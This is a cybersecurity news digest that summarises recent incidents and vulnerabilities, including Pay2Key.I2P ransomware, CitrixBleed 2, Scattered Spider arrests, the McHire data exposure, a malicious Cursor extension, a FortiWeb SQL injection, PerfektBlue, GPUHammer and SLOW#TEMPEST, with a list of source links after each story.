CyberSecurity news

FlagThis

Pierluigi Paganini@securityaffairs.com //
Iran is reportedly sponsoring cyber warfare by leveraging ransomware-as-a-service (RaaS) operations with increased profit-sharing incentives for affiliates targeting the United States and Israel. The Pay2Key RaaS group, now operating as Pay2Key.I2P, has resurfaced with an offering of an 80% profit share to hackers who successfully attack Iran's adversaries. This tactic aims to undermine the economies and critical infrastructure of these targeted nations, aligning with a broader trend of nation-states utilizing cyberattacks to advance foreign policy and circumvent economic sanctions. Reports indicate that this operation has already collected over $4 million in extortion payments within a four-month period, with individual operators boasting significant profits.

The resurgence of Pay2Key.I2P highlights the evolving capabilities of Iranian-backed advanced persistent threat (APT) groups. These groups, including those tracked as MuddyWater and APT33, have been observed launching more attacks against U.S. industrial entities. The Pay2Key.I2P campaign is noted for its sophistication, utilizing the I2P anonymizing network and integrating features from other known malware like Mimic. This strategic move not only expands their attack surface but also demonstrates a clear ideological commitment, with operators explicitly encouraged to target those perceived as enemies of Iran. The group has also expanded its capabilities to include Linux-targeted ransomware, further broadening its potential impact.

This development underscores a growing concern in the cybersecurity landscape, where nation-states are increasingly employing cyberattacks as a tool for geopolitical objectives. The increased profit-sharing offered by Pay2Key.I2P signifies a more aggressive recruitment strategy for cybercriminals willing to engage in these state-sponsored attacks. As these nations continue to invest in and develop their cyber warfare capabilities, the global cybersecurity risks are expected to escalate significantly. Security professionals are urged to stay informed about these evolving threats, understanding attacker methodologies and tools to effectively manage the mounting risks posed by nation-state actors.

Recommended read:
References :
  • securityaffairs.com: Iranian group Pay2Key.I2P ramps Up ransomware attacks against Israel and US with incentives for affiliates
  • www.morphisec.com: Reporting on Iranian CyberWarfare
  • newsinterpretation.com: Iranian ransomware gang Pay2Key/I2P returns, offers huge rewards for attacks on U.S. and Israel.
  • Matthew Rosenquist: Iran sponsored Pay2Key Ransomware-as-a-Service (RaaS)
  • securityonline.info: Iranian Ransomware “Pay2Key.I2P†Resurfaces on I2P Network, Offering 80% Profit for Targeting Western Enemies
  • The Hacker News: Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cybercriminals

@socprime.com //
Citrix NetScaler ADC and Gateway systems are currently facing a critical security threat, identified as CVE-2025-5777, and widely nicknamed "CitrixBleed 2". This vulnerability, similar to the infamous CitrixBleed from 2023, allows unauthenticated attackers to exploit memory overread issues. This exploitation can lead to the disclosure of sensitive information, including session tokens and user credentials, enabling attackers to bypass multi-factor authentication and hijack active remote sessions. Security researchers have noted that exploitation of this flaw began as early as mid-June, with evidence pointing to its use in active hacking campaigns.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has officially added CVE-2025-5777 to its Known Exploited Vulnerabilities catalog, citing evidence of active exploitation. This designation carries significant weight, and CISA has issued a stern warning, urging federal civilian agencies to apply necessary patches within 24 hours. The urgency stems from the understanding that vulnerabilities like this are frequent vectors for malicious cyber actors, posing a substantial risk to government and corporate networks. While Citrix initially released guidance and patches in June, concerns have been raised about the vendor's response in acknowledging the widespread exploitation of this critical flaw.

The exploitation of CitrixBleed 2, alongside other critical vulnerabilities like CVE-2025-5349 and CVE-2025-6543, presents a significant risk to organizations. CVE-2025-5777 specifically allows attackers to steal session tokens, effectively enabling them to impersonate authenticated users and bypass security measures like MFA. This is a direct echo of the impact of the original CitrixBleed vulnerability, which was widely abused by nation-state actors and ransomware groups. The ongoing exploitation means that a considerable portion of the Citrix NetScaler user base may still be vulnerable, underscoring the critical need for immediate patching and diligent security practices.

Recommended read:
References :
  • Wiz Blog | RSS feed: Critical vulnerabilities in NetScaler ADC exploited in-the-wild: everything you need to know
  • labs.watchtowr.com: How Much More Must We Bleed? - Citrix NetScaler Memory Disclosure (CitrixBleed 2 CVE-2025-5777) - watchTowr Labs
  • socprime.com: CVE-2025-5777 Detection: A New Critical Vulnerability Dubbed “CitrixBleed 2†in NetScaler ADC Faces Exploitation Risk
  • SOC Prime Blog: CVE-2025-5777 Detection: A New Critical Vulnerability Dubbed “CitrixBleed 2†in NetScaler ADC Faces Exploitation Risk
  • Talkback Resources: CVE-2025-5777: CitrixBleed 2 Write-Up… Maybe?
  • Resources-2: ​​CVE-2025-5777: Citrix Bleed 2 Memory Leak Vulnerability Explained
  • Glenn ?: 🥜 & - Thanks to Horizon3, we pushed a tag out today for CitrixBleed 2 CVE-2025-5777 and are backfilling.
  • community.emergingthreats.net: Citrix Netscaler ADC & Gateway Memory Leak CitrixBleed2 (CVE-2025-5777)
  • doublepulsar.com: CitrixBleed 2 exploitation started mid-June — how to spot it
  • horizon3.ai: CVE-2025-5777: CitrixBleed 2 Write-Up… Maybe?
  • The Register - Security: CitrixBleed 2 exploits are on the loose as security researchers yell and wave their hands
  • www.stormshield.com: Security alert Citrix NetScaler CVE-2025-5777: Stormshield Products Response
  • Stormshield: Security alert Citrix NetScaler CVE-2025-5777
  • techcrunch.com: CISA confirms hackers are actively exploiting critical Citrix Bleed 2 bug
  • Blog: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks
  • Zack Whittaker: CISA has given the federal government just one day to patch its NetScaler systems, after confirming Citrix Bleed 2 is being actively exploited in hacking campaigns.
  • www.cybersecuritydive.com: Researchers, CISA confirm active exploitation of critical Citrix Netscaler flaw
  • www.imperva.com: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks
  • The Register - Security: Now everybody but Citrix agrees that CitrixBleed 2 is under exploit
  • techcrunch.com: CISA warns hackers are actively exploiting critical ‘Citrix Bleed 2’ security flaw
  • The Hacker News: CISA adds Citrix NetScaler CVE-2025-5777 to KEV Catalog as Active Exploits Target Enterprises
  • Help Net Security: CISA has added one new vulnerability to its Known Exploited Vulnerabilities catalog, based on evidence of active exploitation.
  • securityaffairs.com: U.S. CISA adds Citrix NetScaler ADC and Gateway flaw to its Known Exploited Vulnerabilities catalog
  • Talkback Resources: CISA tags Citrix Bleed 2 as exploited, gives agencies a day to patch

@blog.checkpoint.com //
Scattered Spider, a financially motivated cyber threat group, has significantly expanded its targeting, with recent intelligence highlighting a new focus on the aviation sector. Known for its aggressive social engineering tactics and identity-focused intrusions, the group has previously targeted telecommunications, SaaS, cloud, and financial services by hijacking user identities and exploiting authentication flows. The FBI has issued a warning, indicating that airlines are now directly in the crosshairs of Scattered Spider. Their methods often involve sophisticated techniques such as SIM swapping, impersonating helpdesk personnel, and employing adversary-in-the-middle (AiTM) phishing to obtain valid credentials and tokens, frequently bypassing multi-factor authentication (MFA). This broader targeting strategy underscores the evolving and increasingly pervasive threat posed by this group.

In a significant development that underscores the reach of Scattered Spider, UK authorities have arrested four individuals linked to a spree of cyberattacks that crippled major British retailers, including Marks & Spencer, Harrods, and the Co-op earlier this year. The arrests, which involved individuals aged 17 to 20, are a major step in a high-priority investigation. The National Crime Agency (NCA) confirmed the arrests, suspecting the individuals of Computer Misuse Act offenses, blackmail, money laundering, and participation in organized crime. These retail attacks caused substantial disruption, with Marks & Spencer estimating losses of around £300 million due to the incident. The methods employed in these attacks, which reportedly included gaining access through social engineering to deploy ransomware, align with Scattered Spider's known modus operandi.

The growing threat posed by Scattered Spider has prompted cybersecurity experts to issue alerts, particularly concerning their expansion into the aviation sector. The group's ability to effectively compromise user identities and bypass security measures like MFA makes them a formidable adversary. Their recent targeting of airlines, following major disruptions in the retail sector, signifies a dangerous escalation. Companies within the aviation industry, and indeed across all sectors, must remain vigilant and bolster their identity-centric defenses to counter the sophisticated tactics employed by Scattered Spider, which include advanced phishing kits, dynamic command and control infrastructure, and custom malware for persistent access.

Recommended read:
References :
  • blog.checkpoint.com: Exposing Scattered Spider: New Indicators Highlight Growing Threat to Enterprises and Aviation
  • Resources-2: Tracking Scattered Spider Through Identity Attacks and Token Theft
  • Cloud Security Alliance: Scattered Spider: The Group Behind Major ESXi Ransomware Attacks
  • BrianKrebs: You've probably read by now that British authorities this week arrested 4 people aged 17-20 in re an investigation into data ransom attacks from the cybercrime group Scattered Spider, which has been blamed in breaches at Marks & Spencer, Harrods, MGM Casinos and a bunch of airlines recently.
  • infosec.exchange: 3 teenagers aged 17-19 and a 20-year-old woman arrested in the UK this morning in connection with cyber attacks on Marks & Spencer (M&S) and Co-op retail chains in April-May this year
  • Zack Whittaker: New, by me: U.K. authorities have confirmed the arrest of four alleged hackers behind the recent U.K. retail hacking spree targeting Marks & Spencer, Harrods, and the Co-op earlier this year. The hackers are allegedly linked to Scattered Spider; one of the suspects is aged 17.
  • techcrunch.com: The U.K. National Crime Agency said the suspects are in custody in relation to the hacks targeting Marks & Spencer, Harrods, and the Co-op.
  • SecureWorld News: 4 Arrested in U.K. for Cyberattacks on Retail Tied to Scattered Spider
  • techcrunch.com: The U.K. National Crime Agency said the suspects are in custody in relation to the hacks targeting Marks & Spencer, Harrods, and the Co-op.
  • www.nationalcrimeagency.gov.uk: Report on the arrests of four individuals linked to the Scattered Spider hacking group for the cyberattacks on UK retailers.
  • The Register - Security: NCA arrests four in connection with UK retail ransomware attacks
  • krebsonsecurity.com: You've probably read by now that British authorities this week arrested 4 people aged 17-20 in re an investigation into data ransom attacks from the cybercrime group Scattered Spider, which has been blamed in breaches at Marks & Spencer, Harrods, MGM Casinos and a bunch of airlines recently.
  • thecyberexpress.com: UK NCA Arrests Four in Cyberattacks on M&S, Co-op, and Harrods
  • HYPR Blog: Deconstructing the Gen-Z Hackers behind the £440M Cyber Attack on Marks & Spencer, Co-op, and Harrods
  • cyberscoop.com: UK arrests four for cyberattacks on major British retailers
  • Threats | CyberScoop: UK arrests four for cyberattacks on major British retailers
  • WIRED: 4 Arrested Over Scattered Spider Hacking Spree
  • blog.knowbe4.com: Alert from KnowBe4 about Scattered Spider targeting the aviation sector.
  • Metacurity: UK's NCA arrested four people for M&S, Co-Op cyberattacks
  • Risky.Biz: Four Key Players Drive Scattered Spider
  • Talkback Resources: UK charges four in Scattered Spider ransom group
  • TechInformed: Four people have been arrested as part of a National Crime Agency (NCA) investigation into cyberattacks targeting major UK retailers M&S, Harrods and Co-op.
  • Help Net Security: The UK's National Crime Agency (NCA) arrested four individuals suspected of being involved in cyberattacks on major retailers in the country, including Marks & Spencer, Co-op, and Harrods.
  • hackread.com: UK Arrests Woman and Three Men for Cyberattacks on M&S Co-op and Harrods
  • securityaffairs.com: UK NCA arrested four people over M&S, Co-op cyberattacks
  • BleepingComputer: The UK's National Crime Agency (NCA) arrested four people suspected of being involved in cyberattacks on major retailers in the country, including Marks & Spencer, Co-op, and Harrods.

@databreaches.net //
McDonald's has been at the center of a significant data security incident involving its AI-powered hiring tool, Olivia. The vulnerability, discovered by security researchers, allowed unauthorized access to the personal information of approximately 64 million job applicants. This breach was attributed to a shockingly basic security flaw: the AI hiring platform's administrator account was protected by the default password "123456." This weak credential meant that malicious actors could potentially gain access to sensitive applicant data, including chat logs containing personal details, by simply guessing the username and password. The incident raises serious concerns about the security measures in place for AI-driven recruitment processes.

The McHire platform, which is utilized by a vast majority of McDonald's franchisees to streamline the recruitment process, collects a wide range of applicant information. Researchers were able to access chat logs and personal data, such as names, email addresses, phone numbers, and even home addresses, by exploiting the weak password and an additional vulnerability in an internal API. This means that millions of individuals who applied for positions at McDonald's may have had their private information compromised. The ease with which this access was gained highlights a critical oversight in the implementation of the AI hiring system, underscoring the risks associated with inadequate security practices when handling large volumes of sensitive personal data.

While the security vulnerability has reportedly been fixed, and there are no known instances of the exposed data being misused, the incident serves as a stark reminder of the potential consequences of weak security protocols, particularly with third-party vendors. The responsibility for maintaining robust cybersecurity standards falls on both the companies utilizing these technologies and the vendors providing them. This breach emphasizes the need for rigorous security testing and the implementation of strong, unique passwords and multi-factor authentication to protect applicant data from falling into the wrong hands. Companies employing AI in sensitive processes like hiring must prioritize data security to maintain the trust of job seekers and prevent future breaches.

Recommended read:
References :
  • Talkback Resources: Leaking 64 million McDonald’s job applications
  • Security Latest: McDonald’s AI Hiring Bot Exposed Millions of Applicants' Data to Hackers Using the Password ‘123456’
  • Malwarebytes: The job applicants' personal information could be accessed by simply guessing a username and using the password “12345.â€
  • www.wired.com: McDonald’s AI Hiring Bot Exposed Millions of Applicants' Data to Hackers Using the Password ‘123456’
  • www.pandasecurity.com: Yes, it was. The personal information of approximately 64 million McDonald’s applicants was left unprotected due to login details consisting of a username and password…
  • Cybersecurity Blog: McDonald's Hiring Bot Blunder: AI, Fries and a Side of Job Seeker Data
  • techcrunch.com: AI chatbot’s simple ‘123456’ password risked exposing personal data of millions of McDonald’s job applicants
  • www.pandasecurity.com: Was the data of 64 million McDonald’s applicants left protected only by a flimsy password?
  • Talkback Resources: McDonald’s job app exposes data of 64 Million applicants
  • hackread.com: McDonald’s AI Hiring Tool McHire Leaked Data of 64 Million Job Seekers
  • futurism.com: McDonald’s AI Hiring System Just Leaked Personal Data About Millions of Job Applicants
  • hackread.com: Security flaws in McDonald's McHire chatbot exposed over 64 million applicants' data.
  • www.csoonline.com: McDonald’s AI hiring tool’s password ‘123456’: Exposes data of 64M applicants
  • Palo Alto Networks Blog: The job applicants' personal information could be accessed by simply guessing a username and using the password “123456.
  • SmartCompany: Big Hack: How a default password left millions of McDonald’s job applications exposed
  • Talkback Resources: '123456' password exposed chats for 64 million McDonald’s job applicants
  • databreaches.net: McDonald’s just got a supersized reminder to beef up its digital security after its recruitment platform allegedly exposed the sensitive data of 64 million applicants.
  • BleepingComputer: Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the chats of more than 64 million job applications across the United States.
  • PrivacyDigest: McDonald’s Exposed Millions of Applicants' Data to Using the ‘123456’
  • www.tomshardware.com: McDonald's McHire bot exposed personal information of 64M people by using '123456' as a password in 2025
  • bsky.app: Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the personal information of more than 64 million job applicants across the United States.
  • malware.news: McDonald’s just got a supersized reminder to beef up its digital security after its recruitment platform allegedly exposed the sensitive data of 64 million applicants.

@securelist.com //
Developers using the AI-powered coding assistant Cursor have fallen victim to a sophisticated crypto heist, losing an estimated $500,000. The incident involved a malicious extension, disguised as a legitimate tool for Solidity developers, which was distributed through the Open VSX marketplace. This marketplace, which serves as a source for extensions for AI development tools like Cursor, does not undergo the same stringent security checks as other marketplaces, creating a vulnerability that attackers exploited. The fake extension, titled "Solidity Language," managed to gain tens of thousands of downloads, likely boosted by bot activity, and successfully deceived even experienced users.

The malicious extension operated by silently executing PowerShell scripts and installing remote access tools on the victim's computer. Upon installation, the extension contacted a command-and-control server to download and run these harmful scripts. The attackers then leveraged the installed remote access application, ScreenConnect, to gain full control of the compromised system. This allowed them to upload additional malicious payloads, specifically targeting the developer's crypto wallet passphrases and ultimately siphoning off approximately $500,000 in cryptocurrency assets. The attackers also employed algorithm tricks to ensure the malicious extension ranked highly in search results, further increasing its visibility and the likelihood of it being downloaded by unsuspecting developers.

This incident highlights a growing trend of attacks that leverage vulnerabilities within the open-source software ecosystem. While the Solidity Language extension itself offered no actual functionality, its deceptive appearance and elevated search ranking allowed it to trick users into installing malware. Security experts are urging developers to exercise extreme caution when installing extensions, emphasizing the importance of verifying extension authors and using robust security tools. The weaponization of AI-enhanced development tools serves as a stark reminder that the very tools designed to enhance productivity can be turned into vectors for significant financial loss if not handled with the utmost security awareness.

Recommended read:
References :
  • Lukasz Olejnik: Malicious extension to AI software development assistant Cursor contained malware. It silently executed PowerShell scripts, installed remote access tools, and stole $500K in crypto from a blockchain dev. It ranked high in search due to algorithm tricks, fooling even experienced users. Always verify extensions, check author names, and use real security tools—AI-enhanced dev tools can be weaponized too.
  • Securelist: Code highlighting with Cursor AI for $500,000
  • securelist.com: Malicious extension to AI software development assistant Cursor contained malware. It silently executed PowerShell scripts, installed remote access tools, and stole $500K in crypto from a blockchain dev.
  • cyberinsider.com: Fake Visual Studio Code extension for Cursor led to $500K theft

Eric Geller@cybersecuritydive.com //
Businesses are facing a growing wave of sophisticated phishing attacks, with mobile-based scams seeing a significant surge. Reports indicate that nearly six in ten companies have experienced incidents involving voice or text phishing that resulted in executive impersonation. Despite the prevalence of these attacks, with 77% of companies experiencing at least one such incident in the past six months, a concerningly low number of businesses, only half of those surveyed, express significant concern. This overconfidence leaves organizations more vulnerable than they realize, as attackers increasingly leverage mobile channels to trick employees into revealing credentials. These tactics often bypass traditional security measures, making detection incredibly difficult until irreversible damage has occurred.

The threat landscape is further complicated by the emergence of AI-generated content used to create highly convincing phishing lures. Researchers have noted that AI-powered search engine summaries are mistakenly suggesting phishing sites when users are attempting to find legitimate login pages. This fusion of AI and social engineering techniques makes these scams harder to identify and defend against. Compounding these issues, a major data leak involving McDonald's recruitment chatbot, Olivia, highlighted a critical security oversight. An administrator account was found using the default password "123456," potentially exposing sensitive data from over 60 million job applications. This breach underscores how basic security flaws can lead to massive data exposure in even advanced systems.

To combat this escalating threat, companies are strongly advised to bolster their security awareness training programs and implement more robust security measures. The use of AI in crafting phishing campaigns, coupled with the pervasive nature of mobile attacks and basic security vulnerabilities, creates a more dangerous environment for businesses. Organizations must prioritize comprehensive training that educates employees on recognizing these advanced social engineering tactics and reinforce the importance of strong, unique passwords and multi-factor authentication across all systems. Proactive security strategies are essential to protect sensitive data and maintain operational integrity in the face of evolving cyber threats.

Recommended read:
References :

David Jones@cybersecuritydive.com //
The cybersecurity community is on high alert due to the active exploitation of a critical vulnerability in Citrix NetScaler devices, known as CitrixBleed 2 (CVE-2025-5777). This flaw allows attackers to perform dangerous memory leak attacks, potentially exposing sensitive user credentials and other confidential data. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has officially recognized the severity of this threat by adding it to its Known Exploited Vulnerabilities catalog, citing evidence of active exploitation. Federal agencies have been given a strict 24-hour deadline to patch affected systems, underscoring the urgency of the situation and the significant risk posed to government and enterprise networks.

CitrixBleed 2, which researchers have noted shares similarities with a previous critical vulnerability in Citrix NetScaler (CVE-2023-4966), enables attackers to bypass multi-factor authentication (MFA) and hijack user sessions. This memory leak vulnerability, stemming from insufficient input validation, allows unauthenticated attackers to read sensitive information from NetScaler devices configured as Gateways or AAA virtual servers. The exploitation of this flaw appears to have begun in late June, with reports indicating that some attackers may be linked to ransomware groups. The ease with which session tokens can be stolen and replayed to impersonate authenticated users presents a substantial threat to organizations relying on these Citrix products for remote access.

In response to the escalating threat, cybersecurity researchers have confirmed widespread scanning and probing activity for the vulnerability. The U.S. CISA's inclusion of CVE-2025-5777 on its Known Exploited Vulnerabilities list serves as a strong warning to all organizations to prioritize patching their Citrix NetScaler ADC and Gateway devices immediately. Failure to do so leaves networks vulnerable to sophisticated attacks that can lead to significant data breaches and operational disruptions. Organizations are strongly advised to apply the latest security patches and updates as soon as possible to mitigate the risks associated with this critical vulnerability.

Recommended read:
References :
  • The Register - Security: Now everybody but Citrix agrees that CitrixBleed 2 is under exploit
  • securityaffairs.com: U.S. CISA adds Citrix NetScaler ADC and Gateway flaw to its Known Exploited Vulnerabilities catalog
  • The Hacker News: CISA Adds Citrix NetScaler CVE-2025-5777 to KEV Catalog as Active Exploits Target Enterprises
  • www.cybersecuritydive.com: Researchers, CISA confirm active exploitation of critical Citrix Netscaler flaw
  • Blog: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks
  • techcrunch.com: CISA warns hackers are actively exploiting critical ‘Citrix Bleed 2’ security flaw
  • techcrunch.com: CISA warns hackers are actively exploiting critical ‘Citrix Bleed 2’ security flaw
  • www.imperva.com: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks

info@thehackernews.com (The@The Hacker News //
Fortinet has issued a critical patch for a severe SQL injection vulnerability affecting its FortiWeb product. Identified as CVE-2025-25257, the flaw resides within the Fabric Connector feature. This vulnerability allows an unauthenticated attacker to execute arbitrary commands and potentially gain access to sensitive information on affected systems. The issue stems from improper input sanitization, enabling attackers to manipulate SQL queries through specially crafted HTTP requests. The vulnerability has a high severity score of 9.8 out of 10, highlighting the significant risk it poses to organizations.

The vulnerability specifically impacts multiple versions of FortiWeb, including versions 7.6.0 through 7.6.3, 7.4.0 through 7.4.7, 7.2.0 through 7.2.10, and 7.0.0 through 7.0.10. The FortiWeb Fabric Connector acts as a crucial middleware, connecting FortiWeb web application firewalls with other Fortinet products for dynamic security updates. Attackers can exploit this flaw by sending malicious SQL payloads within HTTP Authorization headers, bypassing authentication controls and potentially leading to remote code execution. Researchers have demonstrated that this SQL injection can be escalated to achieve full system compromise by leveraging MySQL's INTO OUTFILE statement to write files to the server and executing them via Python scripts.

Given the critical nature of this vulnerability and the availability of proof-of-concept exploits, Fortinet strongly urges all users of affected FortiWeb versions to apply the provided patches immediately. Organizations should update to FortiWeb 7.6.4, 7.4.8, 7.2.11, 7.0.11, or later versions to mitigate the risk of exploitation. As a temporary workaround, disabling the HTTP/HTTPS administrative interface can also help reduce exposure until the patches can be applied. Swift action is crucial to prevent potential data breaches and unauthorized access to sensitive systems.

Recommended read:
References :
  • labs.watchtowr.com: Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) - watchTowr Labs
  • The Hacker News: Fortinet Releases Patch for Critical SQL Injection Flaw in FortiWeb (CVE-2025-25257)
  • arcticwolf.com: CVE-2025-25257: Critical Unauthenticated SQL Injection Vulnerability in FortiWeb
  • Talkback Resources: Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)
  • cyberpress.org: Fortinet FortiWeb Vulnerability Exploited for Remote Code Execution via Fabric Connector
  • Talkback Resources: Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) [app] [exp]
  • cyberpress.org: Cyberpress: Fortinet FortiWeb Fabric Connector Vulnerability Exploited to Execute Remote Code
  • Talkback Resources: Proof-of-concept exploits have been released for a critical SQLi vulnerability in Fortinet FortiWeb that can be used to achieve pre-authenticated remote code execution on vulnerable servers.
  • Arctic Wolf: CVE-2025-25257: Critical Unauthenticated SQL Injection Vulnerability in FortiWeb
  • hackread.com: Critical Vulnerability Exposes Fortinet FortiWeb to Full Takeover (CVE-2025-25257)
  • securityaffairs.com: Patch immediately: CVE-2025-25257 PoC enables remote code execution on Fortinet FortiWeb
  • gbhackers.com: Fortinet FortiWeb Fabric Connector Flaw Enables Remote Code Execution
  • Cyber Security News: Security researchers have identified a critical pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb Fabric Connector, designated as CVE-2025-25257, that allows unauthenticated attackers to achieve remote code execution on affected systems.
  • gbhackers.com: Security researchers have identified a severe pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb Fabric Connector, designated as CVE-2025-25257, that allows unauthenticated attackers to execute unauthorized SQL commands and potentially achieve remote code execution.
  • cert.europa.eu: On July 8, 2025, Fortinet released a security advisory addressing a critical vulnerability in its FortiWeb product that would allow an attacker to execute unauthorised code or commands on the affected systems.

@cyberscoop.com //
Cybersecurity researchers have identified a critical set of vulnerabilities, collectively named PerfektBlue, affecting OpenSynergy's BlueSDK Bluetooth stack. These flaws, which can be chained together to achieve remote code execution, pose a significant risk to millions of vehicles. Automakers such as Mercedes-Benz, Volkswagen, and Skoda are confirmed to be impacted, along with an additional unnamed manufacturer. The vulnerabilities could allow attackers, within Bluetooth range, to compromise infotainment systems, potentially leading to unauthorized access to sensitive vehicle functions.

The PerfektBlue attack leverages a chain of vulnerabilities including a critical use-after-free flaw in the AVRCP service (CVE-2024-45434) and issues within L2CAP and RFCOMM protocols. Successful exploitation can enable attackers to execute arbitrary code on a car's system, potentially allowing them to track GPS coordinates, record audio, access contact lists, and even pivot to more critical systems. While infotainment systems are often isolated, the effectiveness of this separation varies by manufacturer, meaning some attacks could provide a pathway to controlling core vehicle functions.

OpenSynergy confirmed these vulnerabilities last year and released patches in September 2024. However, many automakers have yet to implement these crucial updates, leaving millions of vehicles exposed. The attack requires an attacker to pair with the target vehicle's infotainment system via Bluetooth, a process that can vary in user interaction depending on the manufacturer's implementation. While patches are available, the widespread delay in deployment means that a significant number of cars remain vulnerable to this potentially far-reaching exploit.

Recommended read:
References :
  • cyberscoop.com: Researchers identify critical vulnerabilities in automotive Bluetooth systems
  • The Hacker News: PerfektBlue Bluetooth Vulnerabilities Expose Millions of Vehicles to Remote Code Execution
  • securityaffairs.com: PerfektBlue Bluetooth attack allows hacking infotainment systems of Mercedes, Volkswagen, and Skoda
  • CyberScoop: Researchers identify critical vulnerabilities in automotive Bluetooth systems
  • www.bleepingcomputer.com: Four vulnerabilities dubbed PerfektBlue and affecting the BlueSDK Bluetooth stack from OpenSynergy can be exploited to achieve remote code execution and potentially allow access to critical elements in vehicles from multiple vendors, including Mercedes-Benz AG, Volkswagen, and Skoda.
  • PCWorld: Your Mercedes or Volkswagen could get hacked via Bluetooth
  • malware.news: Malware News: Widespread automobile hacking likely with PerfektBlue Bluetooth bugs

info@thehackernews.com (The@The Hacker News //
A significant security vulnerability, dubbed GPUHammer, has been demonstrated against NVIDIA GPUs, specifically targeting GDDR6 memory. Researchers from the University of Toronto have successfully executed a Rowhammer attack variant on an NVIDIA A6000 GPU, causing bit flips in the memory. This type of attack exploits the physical behavior of DRAM chips, where rapid access to one memory row can induce errors, or bit flips, in adjacent rows. While Rowhammer has been a known issue for CPUs, this marks the first successful demonstration against a discrete GPU, raising concerns about the integrity of data and computations performed on these powerful processors, especially within the burgeoning field of artificial intelligence.

The practical implications of GPUHammer are particularly alarming for machine learning models. In a proof-of-concept demonstration, researchers were able to degrade the accuracy of a deep neural network model from 80% to a mere 0.1% by inducing a single bit flip. This degradation highlights the vulnerability of AI infrastructure, which increasingly relies on GPUs for parallel processing and complex calculations. Such attacks could compromise the reliability and trustworthiness of AI systems, impacting everything from image recognition to complex decision-making processes. NVIDIA has acknowledged these findings and is urging its customers to implement specific security measures to defend against this threat.

In response to the GPUHammer attack, NVIDIA is strongly recommending that customers enable System-level Error Correction Codes (ECC) on their GDDR6 GPUs. ECC is a hardware-level mechanism designed to detect and correct errors in memory, and it has been proven to effectively neutralize the Rowhammer threat. NVIDIA's guidance applies to a wide range of its professional and data center GPU architectures, including Blackwell, Hopper, Ada, Ampere, and Turing. While consumer-grade GPUs may have limited ECC support, the company emphasizes that its enterprise-grade and data center solutions, many of which have ECC enabled by default, are the recommended choice for applications requiring enhanced security assurance. This proactive measure aims to protect users from data tampering and maintain the integrity of critical workloads.

Recommended read:
References :
  • cyberpress.org: GPUHammer: First Rowhammer Exploit Aimed at NVIDIA GPUs
  • The Hacker News: GPUHammer: New RowHammer Attack Variant Degrades AI Models on NVIDIA GPUs
  • Talkback Resources: NVIDIA shares guidance to defend GDDR6 GPUs against Rowhammer attacks
  • BleepingComputer: NVIDIA shares guidance to defend GDDR6 GPUs against Rowhammer attacks
  • Cyber Security News: The hardware security landscape has taken a dramatic turn as researchers have, for the first time, demonstrated a successful Rowhammer attack targeting NVIDIA A6000 GPUs utilizing GDDR6 memory.
  • gbhackers.com: Researchers from the University of Toronto have unveiled the first successful Rowhammer attack on an NVIDIA GPU, specifically targeting the A6000 model equipped with GDDR6 memory.
  • gpuhammer.com: GPUHammer: Rowhammer bit flips on GPU memories, specifically on a GDDR6 memory in an NVIDIA A6000 GPU. Our attacks induce bit flips across all tested DRAM banks, despite in-DRAM defenses like TRR, using user-level CUDA code.
  • www.bleepingcomputer.com: NVIDIA shares guidance to defend GDDR6 GPUs against Rowhammer attacks

@gbhackers.com //
Cybersecurity experts have identified a significant evolution in the tactics employed by the SLOW#TEMPEST malware group, which is now utilizing advanced obfuscation techniques to bypass detection systems. This latest variant is distributed as an ISO file containing both malicious and seemingly benign files, a common strategy to evade initial scanning. The malware employs DLL sideloading, a technique where a legitimate, signed executable like DingTalk.exe is tricked into loading a malicious DLL, zlibwapi.dll. This loader DLL then decrypts and executes a payload appended to another DLL, ipc_core.dll, creating a multi-stage attack that complicates analysis and detection.

At the core of SLOW#TEMPEST's enhanced evasion are sophisticated obfuscation methods designed to thwart both static and dynamic analysis. The malware utilizes control flow graph (CFG) obfuscation through dynamic jumps, where the target addresses of instructions like JMP RAX are computed at runtime based on system states and CPU flags. This unpredictability renders traditional analysis tools ineffective. Additionally, function calls are heavily obfuscated, with addresses dynamically resolved at runtime, masking the malware's true intentions and obscuring calls to crucial Windows APIs. Researchers have countered these tactics by employing CPU emulation frameworks like Unicorn to isolate and execute dispatcher routines, thereby revealing the dynamic jump destinations and restoring a more comprehensible program flow.

Palo Alto Networks researchers have delved into these advanced obfuscation techniques, highlighting methods and code that can be used to detect and defeat them. Their analysis reveals that the malware authors are actively manipulating execution paths and obscuring function calls to make their malicious code as difficult to analyze as possible. The campaign's use of dynamic jumps and obfuscated function calls forces security practitioners to adopt advanced emulation and scripting to dissect the malware's operations effectively. Understanding and counteracting these evolving tactics is crucial for developing robust detection rules and strengthening defenses against increasingly sophisticated cyber threats. Palo Alto Networks customers are reportedly better protected against these threats through products like Advanced WildFire, Cortex XDR, and XSIAM.

Recommended read:
References :
  • unit42.paloaltonetworks.com: Evolving Tactics of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques
  • Cyber Security News: SLOW#TEMPEST Employs Advanced Evasion Techniques to Evade Detection
  • gbhackers.com: SLOW#TEMPEST Hackers Adopt New Evasion Tactics to Bypass Detection Systems
  • cyberpress.org: SLOW#TEMPEST Employs Advanced Evasion Techniques to Evade Detection
  • gbhackers.com: SLOW#TEMPEST Hackers Adopt New Evasion Tactics to Bypass Detection Systems
  • malware.news: Malware News: SLOW#TEMPEST Hackers Adopt New Evasion Tactics to Bypass Detection Systems
  • Virus Bulletin: Palo Alto Networks researchers explore the obfuscation techniques employed by the malware authors in the SLOW#TEMPEST campaign and highlight methods and code that can be used to detect and defeat these techniques.

@cyberalerts.io //
